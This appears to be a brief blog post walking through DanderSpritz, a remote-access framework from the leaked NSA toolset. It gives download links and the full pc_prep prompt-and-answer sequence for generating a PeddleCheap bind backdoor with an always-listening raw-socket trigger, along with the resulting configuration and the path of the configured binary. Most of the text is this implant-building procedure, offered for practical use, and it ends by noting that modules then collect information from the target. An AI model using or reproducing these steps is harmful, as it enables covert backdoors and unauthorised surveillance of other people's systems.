
Trying Out DanderSpritz

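A while ago I needed a remote-access tool that supports forward (bind) connections, so I tried DanderSpritz; it's pretty good.
It is a remote-access tool from the leaked NSA toolset, similar to msf.
https://github.com/3gstudent/fuzzbunch (recommended! avoids strange errors)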
or
https://github.com/fuzzbunch/fuzzbunch
java -jar start.jar
Log naming format: C:\logs\xxx !!!!! Otherwise an error is reported.
pc_prep
Generate the backdoor as required.
Here, choose 25.
Pick the payload type
25
Update advanced settings
NO
Listen AT ALL TIMES?
YES
Allow triggering via a raw socket?
YES
Allow fallback to promiscuous mode on that raw socket?
NO
Disable comms between PC and driver?
NO
Allow triggering via port knocking?
NO
Enter the PC ID [0]
Change LISTEN PORTS?
NO
– Pick a key
–   0) Exit
–   1) Create a new key
–   2) Default
Enter the desired option
2
– Configuration:

– <?xml version='1.0' encoding='UTF-8' ?>
– <PCConfig>
–   <Flags>
–     <PCHEAP_CONFIG_FLAG_24_HOUR/>
–     <PCHEAP_CONFIG_FLAG_RAW_SOCKET_TRIGGER/>
–   </Flags>
–   <Id>0x0</Id>
– </PCConfig>

Is this configuration valid
YES
Do you want to configure with FC?
NO
– Configured binary at:
–   C:\logs\0\z0.0.0.1/Payloads/PeddleCheap_2019_04_25_13h32m34s.934/PC_Level4_exe.configured
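Forward-connection (bind) backdoor

After a successful connection, modules are loaded to collect information about the target.

Use help/aliases to get help.

References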
https://www.anquanke.com/post/id/85907
https://github.com/3gstudent/3gstudent.github.io/blob/master/_posts/2017-4-26-NSA%20DanderSpiritz%E6%B5%8B%E8%AF%95%E6%8C%87%E5%8D%97%E2%80%94%E2%80%94%E6%9C%A8%E9%A9%AC%E7%94%9F%E6%88%90%E4%B8%8E%E6%B5%8B%E8%AF%95.md